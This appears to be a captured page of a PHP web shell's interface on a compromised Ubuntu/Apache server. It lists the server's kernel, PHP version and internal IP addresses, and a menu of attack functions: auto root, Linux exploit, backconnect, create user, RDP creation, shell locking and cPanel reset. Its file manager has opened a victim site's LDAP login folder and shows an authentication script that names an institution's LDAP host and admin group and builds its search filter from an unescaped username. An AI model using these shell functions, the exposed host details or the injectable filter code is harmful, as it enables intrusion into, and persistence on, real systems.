Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
temppayment /
pg /
ldaplogin /
new1 /
[ HOME SHELL ]
Name
Size
Permission
Action
destination.php
14
B
-rw-r--r--
ldap_authenticate.php
1.68
KB
-rw-r--r--
login.php
2.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ldap_authenticate.php
<?php function ldap_authenticate($username, $userpassword) { if(empty($username) || empty($userpassword)) return false; //$ldap_host = "ldap://www.iiitd.edu.in"; $ldap_host = "iiitd.edu.in"; $ldapport = "389"; $ldap_dn = "OU=Users,DC=iiitd,DC=edu.in"; $ldap_group = "Site Admins"; $ldap_usr_dom = "@iiitd.edu.in"; //$ldap = ldap_connect($ldap_host, $ldapport); $ldap = ldap_connect($ldap_host); if($ldap) { echo "$ldap. connected"; die(); } else {echo "Failed"; die();} ldap_set_option($ldap,LDAP_OPT_PROTOCOL_VERSION,3); ldap_set_option($ldap,LDAP_OPT_REFERRALS,0); // validate username and password if($bind = @ldap_bind($ldap, $username.$ldap_usr_dom, $userpassword)) { $filter = "(sAMAccountName=".$username.")"; $attr = array("memberof"); $result = ldap_search($ldap, $ldap_dn, $filter, $attr) or exit("LDAP lookup failed"); $entries = ldap_get_entries($ldap, $result); ldap_unbind($ldap); // check group permission foreach($entries[0]['memberof'] as $grps) { if(strpos($grps, $ldap_group)) { $access = 1; break; } } if($access != 0) { // session variables $_SESSION['user'] = $username; $_SESSION['access'] = $access; return true; } else { // no access permission return false; } } else { return false; } } ?>
Close